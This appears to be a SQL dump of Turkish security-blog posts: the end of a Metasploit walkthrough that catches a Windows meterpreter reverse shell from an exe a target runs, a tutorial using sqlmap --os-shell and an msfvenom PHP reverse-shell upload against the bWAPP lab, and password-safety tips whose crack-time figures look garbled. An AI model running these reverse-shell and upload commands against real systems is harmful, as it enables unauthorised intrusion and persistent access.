exploitimizi kullanmak için çağırıyoruz.</p>\r\n<p><img class="size-full wp-image-3922 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-18.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="466" height="55" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-18.png 466w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-18-300x35.png 300w" sizes="(max-width: 466px) 100vw, 466px" /></p>\r\n<p>Daha sonra set PAYLOAD windows/meterpreter/reverse_tcp komutunu yazarak meterpreter payloadını exploite dahil ediyoruz.</p>\r\n<p><img class="size-full wp-image-3923 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-19.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="728" height="574" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-19.png 728w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-19-300x237.png 300w" sizes="(max-width: 728px) 100vw, 728px" /></p>\r\n<p>show options komutuyla exploite vermemiz gereken bilgileri görüyoruz. Burada ip adresimizi ve exeyi oluÅŸtururken verdiÄŸimiz port adresimizi yazacağız.<br />\r\nset LHOST 192.168.56.101<br />\r\nset LPORT 443<br />\r\nDaha sonra exploit diyerek programdan gelecek istekleri dinlemeye baÅŸlayacağız.</p>\r\n<p><img class="size-full wp-image-3924 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-20.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="667" height="490" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-20.png 667w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-20-300x220.png 300w" sizes="(max-width: 667px) 100vw, 667px" /></p>\r\n<p>Dinlemeye baÅŸarılı bir ÅŸekilde baÅŸladık. Artık hedef kiÅŸinin programı çalıştırmasını bekliyoruz. Çalıştırdığı anda buraya bilgileri gelecek ve o bilgisayarda eriÅŸim sahibi olacağız.</p>\r\n<p><img class="size-full wp-image-3925 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-21.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1296" height="719" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-21.png 1296w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-21-300x166.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-21-768x426.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-21-1024x568.png 1024w" sizes="(max-width: 1296px) 100vw, 1296px" /></p>\r\n<p>Windows bilgisayardan (hedef), bizim oluÅŸturduÄŸumuz exe çalıştığı anda meterpreter oturumuna sahip oluyoruz.</p>\r\n<p><img class="size-full wp-image-3926 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-22.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1298" height="714" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-22.png 1298w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-22-300x165.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-22-768x422.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-22-1024x563.png 1024w" sizes="(max-width: 1298px) 100vw, 1298px" /></p>\r\n<p>Yazının başında paylaÅŸtığım görsellerdeki meterpreter komutlarını artık hedef sistem zerinde çalıştırabiliriz. Hatta hedefin kullandığı iÅŸletim sisteminin hak yükseltme exploitini kullanarak tüm yetkilere sahip olan bir kullanıcı kaydedebilir, istediÄŸimiz zaman o sisteme baÄŸlanabiliriz.</p>\r\n<p><img class="size-full wp-image-3927 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-23.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="811" height="640" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-23.png 811w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-23-300x237.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-23-768x606.png 768w" sizes="(max-width: 811px) 100vw, 811px" /></p>\r\n<p>Sonuna kadar okuduÄŸunuz için teÅŸekkür ederiz. Paü siber ..</p>', '2017-01-22 16:16:50', 1, 'msfconsole.png'),
(2, 1, 'TR | SQL Injection Kullanarak Sqlmap ile Shell Yükleme', '<p>Bu yazıda SQL Injection kullanarak Sqlmap ile shell yükleyerek sisteme sızacağız. Bunun için Kali Linux,Burpsuite,Sqlmap ve bWAPP (Web Açıklıkları Bulunan Sistem) i kullanacağım.</p>\r\n<p>bWAPP ı <a href="https://sourceforge.net/projects/bwapp/">https://sourceforge.net/projects/bwapp/</a> adresinden indirerek sanal makinanızda ayağa kaldırıp ip adresi ile tarayıcınız üzerinden erişebilirsiniz. Ulaştığınızda kullanıcı adı : bee şifresini : bug olarak girdiğinizde uygulamaya giriş yapacaksınız. Burada bir çok web uygulama açıklıkları bulunmakta. Biz sqli kullanarak shell yükleyeceğiz.</p>\r\n<p><img class="alignnone size-full wp-image-5308" src="https://canyoupwn.me/wp-content/uploads/2017/01/1.png" alt="" width="1363" height="737" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/1.png 1363w, https://canyoupwn.me/wp-content/uploads/2017/01/1-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/1-768x415.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/1-1024x554.png 1024w" sizes="(max-width: 1363px) 100vw, 1363px" /></p>\r\n<p>Burpsuite i açarak uygulamızıda açıyoruz ‘ işareti ile kontrol ettiğimizde resimdeki gibi sqli olduğuna dair bizi mutlu eden hatayla karşılaşıyoruz. Aynı zamanda burp ilede cookiemize ulaşabiliyoruz.</p>\r\n<p><img class="alignnone size-full wp-image-5309" src="https://canyoupwn.me/wp-content/uploads/2017/01/2.png" alt="" width="1363" height="735" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/2.png 1363w, https://canyoupwn.me/wp-content/uploads/2017/01/2-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/2-768x414.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/2-1024x552.png 1024w" sizes="(max-width: 1363px) 100vw, 1363px" /></p>\r\n<p>Daha sonra sqlmap ile url ve cookie mizi aşağıdaki parametrelerle birlikte –os-shell ekleyerek çalıştırıyoruz.</p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->\r\n\r\n <div id="crayon-5884b182d06bd192903083" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">\r\n \r\n <div class="crayon-toolbar" data-settings=" show" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>\r\n <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Satır Numaralarına Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Düz Koda Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Satır Sarımına Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Kodu Genişlet"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Kodu Yeni Pencerede Aç"><div class="crayon-button-icon"></div></div></div></div>\r\n <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>\r\n <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">\r\nsqlmap -u "http://192.168.237.135/bWAPP/sqli_1.php?title=%C4%B1ronman&action=search" --cookie="security_level=0; PHPSESSID=4e4cf5609dfa54a19f3ee164c8d21f75" --os-shell</textarea></div>\r\n <div class="crayon-main" style="">\r\n <table class="crayon-table">\r\n <tr class="crayon-row">\r\n <td class="crayon-nums " data-settings="show">\r\n <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5884b182d06bd192903083-1">1</div></div>\r\n </td>\r\n <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5884b182d06bd192903083-1"><span class="crayon-v">sqlmap</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">u</span><span class="crayon-h"> </span><span class="crayon-s">"http://192.168.237.135/bWAPP/sqli_1.php?title=%C4%B1ronman&action=search"</span><span class="crayon-h"> </span><span class="crayon-o">--</span><span class="crayon-v">cookie</span><span class="crayon-o">=</span><span class="crayon-s">"security_level=0; PHPSESSID=4e4cf5609dfa54a19f3ee164c8d21f75"</span><span class="crayon-h"> </span><span class="crayon-o">--</span><span class="crayon-v">os</span><span class="crayon-o">-</span><span class="crayon-v">shell</span></div></div></td>\r\n </tr>\r\n </table>\r\n </div>\r\n </div>\r\n<!-- [Format Time: 0.0009 seconds] -->\r\n<p><img class="alignnone size-full wp-image-5310" src="https://canyoupwn.me/wp-content/uploads/2017/01/3.png" alt="" width="1363" height="737" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/3.png 1363w, https://canyoupwn.me/wp-content/uploads/2017/01/3-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/3-768x415.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/3-1024x554.png 1024w" sizes="(max-width: 1363px) 100vw, 1363px" /></p>\r\n<p>Sqlmap komutumuzu çalıştırdığımızda bize yukarıdaki gibi hedef sistemin dilini soruyor bu yazılım için php yani 4 diyerek devam ediyoruz.</p>\r\n<p><img class="alignnone size-full wp-image-5311" src="https://canyoupwn.me/wp-content/uploads/2017/01/4.png" alt="" width="1365" height="735" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/4.png 1365w, https://canyoupwn.me/wp-content/uploads/2017/01/4-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/4-768x414.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/4-1024x551.png 1024w" sizes="(max-width: 1365px) 100vw, 1365px" /></p>\r\n<p>Daha sonra dosyamızın nereye yükleneceğini soruyor burada 1 i seçerek devam ediyoruz.</p>\r\n<p><img class="alignnone size-full wp-image-5312" src="https://canyoupwn.me/wp-content/uploads/2017/01/5.png" alt="" width="1365" height="719" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/5.png 1365w, https://canyoupwn.me/wp-content/uploads/2017/01/5-300x158.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/5-768x405.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/5-1024x539.png 1024w" sizes="(max-width: 1365px) 100vw, 1365px" /></p>\r\n<p>Daha sonra dosyamızın yüklendiği adresleri yukarıda gördüğünüz gibi göstermekte.</p>\r\n<p><img class="alignnone size-full wp-image-5313" src="https://canyoupwn.me/wp-content/uploads/2017/01/6.png" alt="" width="1365" height="739" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/6.png 1365w, https://canyoupwn.me/wp-content/uploads/2017/01/6-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/6-768x416.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/6-1024x554.png 1024w" sizes="(max-width: 1365px) 100vw, 1365px" /></p>\r\n<p>192.168.237.135/tmpuidmm.php adresine gittiğimizde shellimizi yükleyebileceğimiz bir sayfa gelmekte.</p>\r\n<p><img class="alignnone size-full wp-image-5314" src="https://canyoupwn.me/wp-content/uploads/2017/01/7.png" alt="" width="1363" height="737" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/7.png 1363w, https://canyoupwn.me/wp-content/uploads/2017/01/7-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/7-768x415.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/7-1024x554.png 1024w" sizes="(max-width: 1363px) 100vw, 1363px" /></p>\r\n<p>Buraya kendi shelliniz varsa onuda yükleyebilirsiniz yada msfvenom ile oluşturabilirsiniz.</p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->\r\n\r\n <div id="crayon-5884b182d06e0661110451" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">\r\n \r\n <div class="crayon-toolbar" data-settings=" show" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>\r\n <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Satır Numaralarına Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Düz Koda Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Satır Sarımına Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Kodu Genişlet"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Kodu Yeni Pencerede Aç"><div class="crayon-button-icon"></div></div></div></div>\r\n <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>\r\n <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">\r\nmsfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.237.128 LPORT=4444 -f raw > shell.php</textarea></div>\r\n <div class="crayon-main" style="">\r\n <table class="crayon-table">\r\n <tr class="crayon-row">\r\n <td class="crayon-nums " data-settings="show">\r\n <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5884b182d06e0661110451-1">1</div></div>\r\n </td>\r\n <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5884b182d06e0661110451-1"><span class="crayon-v">msfvenom</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">p</span><span class="crayon-h"> </span><span class="crayon-v">php</span><span class="crayon-o">/</span><span class="crayon-e">meterpreter_reverse_tcp </span><span class="crayon-v">LHOST</span><span class="crayon-o">=</span><span class="crayon-cn">192.168.237.128</span><span class="crayon-h"> </span><span class="crayon-v">LPORT</span><span class="crayon-o">=</span><span class="crayon-cn">4444</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">f</span><span class="crayon-h"> </span><span class="crayon-v">raw</span><span class="crayon-h"> </span><span class="crayon-o">></span><span class="crayon-h"> </span><span class="crayon-v">shell</span><span class="crayon-sy">.</span><span class="crayon-v">php</span></div></div></td>\r\n </tr>\r\n </table>\r\n </div>\r\n </div>\r\n<!-- [Format Time: 0.0018 seconds] -->\r\n<p><img class="alignnone size-full wp-image-5315" src="https://canyoupwn.me/wp-content/uploads/2017/01/8.png" alt="" width="1361" height="733" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/8.png 1361w, https://canyoupwn.me/wp-content/uploads/2017/01/8-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/8-768x414.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/8-1024x552.png 1024w" sizes="(max-width: 1361px) 100vw, 1361px" /></p>\r\n<p>Oluşturduğumuz shell.php yi sisteme yüklüyoruz.</p>\r\n<p><img class="alignnone size-full wp-image-5316" src="https://canyoupwn.me/wp-content/uploads/2017/01/10.png" alt="" width="1365" height="737" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/10.png 1365w, https://canyoupwn.me/wp-content/uploads/2017/01/10-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/10-768x415.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/10-1024x553.png 1024w" sizes="(max-width: 1365px) 100vw, 1365px" /></p>\r\n<p>Gördüğünüz gibi dosya yüklendi diyor. Buradan metasploit i açarak multi/handler ı çalıştıracağız.</p>\r\n<p><img class="alignnone size-full wp-image-5317" src="https://canyoupwn.me/wp-content/uploads/2017/01/11.png" alt="" width="1365" height="735" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/11.png 1365w, https://canyoupwn.me/wp-content/uploads/2017/01/11-300x162.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/11-768x414.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/11-1024x551.png 1024w" sizes="(max-width: 1365px) 100vw, 1365px" /></p>\r\n<p>Payloadımızı oluştururken girdiğimiz ip ve portları girerek multi/handler ı çalıştırıyoruz. Ve sonra tarayıcımızdan 192.168.237.135/shell.php yi açıyoruz.</p>\r\n<p><img class="alignnone size-full wp-image-5318" src="https://canyoupwn.me/wp-content/uploads/2017/01/12.png" alt="" width="1363" height="731" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/12.png 1363w, https://canyoupwn.me/wp-content/uploads/2017/01/12-300x161.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/12-768x412.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/12-1024x549.png 1024w" sizes="(max-width: 1363px) 100vw, 1363px" /></p>\r\n<p>Görüldüğü gibi meterpreter satırına düşmüş bulunmaktayız.</p>\r\n<p><img class="alignnone size-full wp-image-5319" src="https://canyoupwn.me/wp-content/uploads/2017/01/13.png" alt="" width="1365" height="731" srcset="https://canyoupwn.me/wp-content/uploads/2017/01/13.png 1365w, https://canyoupwn.me/wp-content/uploads/2017/01/13-300x161.png 300w, https://canyoupwn.me/wp-content/uploads/2017/01/13-768x411.png 768w, https://canyoupwn.me/wp-content/uploads/2017/01/13-1024x548.png 1024w" sizes="(max-width: 1365px) 100vw, 1365px" /></p>\r\n<p>Bu yazıda değineceklerim bu kadar başka bir yazıda görüşmek üzere 🙂</p>', '2017-01-22 16:22:30', 2, 'sqlmap.png');
INSERT INTO `posts` (`post_id`, `user_id`, `title`, `text`, `created_at`, `category_id`, `photo_path`) VALUES
(3, 1, 'TR | Parola Güvenliği', '<p>Teknoloji gün geçtikçe hayatımızın ayrılmaz bir parçası oldu.Teknoloji ne kadar hızlı gelişiyorsa, kişisel verilerimizi koruma ihtiyacımızda aynı hızla artmıştır. Koruma ihtiyacımızla beraber parola, şifre, pin, TAN gibi kavramları daha çok duymaya başladık. İlk başta bunlar arasındaki farkları açıklamak istiyorum.</p>\r\n<ul>\r\n<li><strong>Parola:</strong> Herkesin erişmesini istemediğimiz bir kaynağa, erişebilmek için önceden belirlenmiş karakter dizisidir.</li>\r\n<li><strong>Şifre:</strong> Gizli haberleşmeye yarayan işaretlerin tümüne verilen isimdir.</li>\r\n<li><strong>Pin:</strong> Kişisel tanıtım numarası diye Türkçe çevirebiliriz. 4 veya 6 rakamdan oluşur.</li>\r\n<li><strong>TAN:</strong> Genelde bankacılıkta kullanılan tek seferlik parolalar dır.</li>\r\n</ul>\r\n<p>Bilgisayarlarımızın her gün biraz daha güçlenmesiyle beraber parola kırma güçleri de artmıştır.</p>\r\n<p>Parola uzunluğu ve çözmek için gereken süreler;</p>\r\n<ul>\r\n<li>3 haneli →yaklaşık 0,2 Saniye</li>\r\n<li>5 haneli →yaklaşık 14 Dakika</li>\r\n<li>58 haneli →yaklaşık 53252 Saat</li>\r\n<li>510 haneli →yaklaşık 1179469 Hafta</li>\r\n<li>512 haneli →yaklaşık 84168853 Yıl</li>\r\n<li>515 haneli →yaklaşık 19 104 730 610 573 Yıl</li>\r\n</ul>\r\n<p>Verilerimizi emanet ettiğimiz bu karakter dizisini daha güvenli hale getirmek için belli başlı yollar var.</p>\r\n<ul>\r\n<li>Parolamız en az 8 karakterden oluşmalıdır.</li>\r\n<li>Büyük ve küçük harfler içermelidir.</li>\r\n<li>Harflerin yanı sıra rakam ve özel karakterlere yer verilmelidir.</li>\r\n<li>Kişisel bilgilerimizi parola olarak KULLANMAMALIYIZ.(Örneğin adınız, soyadınız, doğum tarihiniz)</li>\r\n<li>Sözlükteki kelimeler değiştirilmeden parola olarak kullanılmamalıdır.</li>\r\n<li>Parolanın akılda kalıcı olması gerekir. Not olarak tutulan parolalar erişildiği zaman hiçbir anlam ifade etmez.</li>\r\n</ul>\r\n<p>Hatırlanması kolay güçlü parola oluşturma ipuçları;</p>\r\n<ul>\r\n<li>Cümlelerin baş harflerini birleştirebiliriz.\r\n<ul>\r\n<li>Bir elin nesi var, iki elin sesi var. \r\n <span id="crayon-5884b26818493600941588" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-cn">1Env</span><span class="crayon-sy">,</span><span class="crayon-cn">2Esv.</span></span></span></li>\r\n<li>Ben 1980 yılında Ankara’da doğdum. \r\n <span id="crayon-5884b268184a0518856086" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">B1980yAd</span><span class="crayon-sy">.</span></span></span></li>\r\n</ul>\r\n</li>\r\n<li>Harf yerine rakam kullabiliriz.\r\n<ul>\r\n<li>B → \r\n <span id="crayon-5884b268184a4438189350" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-cn">8</span></span></span></li>\r\n<li>Z → \r\n <span id="crayon-5884b268184a8908700329" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-cn">2</span></span></span></li>\r\n<li>I, İ,L, → \r\n <span id="crayon-5884b268184ac185630085" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-cn">1</span></span></span></li>\r\n<li>O → \r\n <span id="crayon-5884b268184b0031849839" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"></span></span></li>\r\n<li>S → \r\n <span id="crayon-5884b268184b4722145496" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-cn">5</span></span></span></li>\r\n<li>G → \r\n <span id="crayon-5884b268184b8298103178" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-cn">6</span></span></span></li>\r\n</ul>\r\n</li>\r\n<li>Bir cümledeki sadece sesli veya sadece sessiz harfleri kullabiliriz.\r\n<ul>\r\n<li>Bu örnek 1 parola. \r\n <span id="crayon-5884b268184bc255842151" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"> <span class="crayon-v">brnk1prl</span><span class="crayon-sy">.</span></span></span></li>\r\n<li>Bu örnek 1 parola. \r\n <span id="crayon-5884b268184c0325828140" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-i">u</span>ö<span class="crayon-v">e1aoa</span><span class="crayon-sy">.</span></span></span></li>\r\n</ul>\r\n</li>\r\n<li>Klavyedeki tuşlara sırasıyla basılarak oluşturulan parolalar GÜVENSİZDİR.\r\n<ul>\r\n<li>\r\n <span id="crayon-5884b268184c4362318686" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-cn">123qwe</span></span></span> , \r\n <span id="crayon-5884b268184c8672617512" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">qwe123</span></span></span> , \r\n <span id="crayon-5884b268184cc659793211" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">asdqwe</span></span></span> gibi karakter dizilerinin kullanılması önerilmez.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p><strong>ÖRNEK</strong><br />\r\nKullanacağımız site: \r\n <span id="crayon-5884b268184d0627986766" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">https</span><span class="crayon-o">:</span><span class="crayon-c">//howsecureismypassword.net</span></span></span></p>\r\n<ul>\r\n<li>Siteye girdiğimizde böyle bir ekran bizi karşılıyor.</li>\r\n</ul>\r\n<p><img class="size-full wp-image-5110 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/12/ss1.jpg" alt="" width="1920" height="247" srcset="https://canyoupwn.me/wp-content/uploads/2016/12/ss1.jpg 1920w, https://canyoupwn.me/wp-content/uploads/2016/12/ss1-300x39.jpg 300w, https://canyoupwn.me/wp-content/uploads/2016/12/ss1-768x99.jpg 768w, https://canyoupwn.me/wp-content/uploads/2016/12/ss1-1024x132.jpg 1024w" sizes="(max-width: 1920px) 100vw, 1920px" /></p>\r\n<p> </p>\r\n<ul>\r\n<li>İlk başta şifremiz \r\n <span id="crayon-5884b268184d4762550691" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" 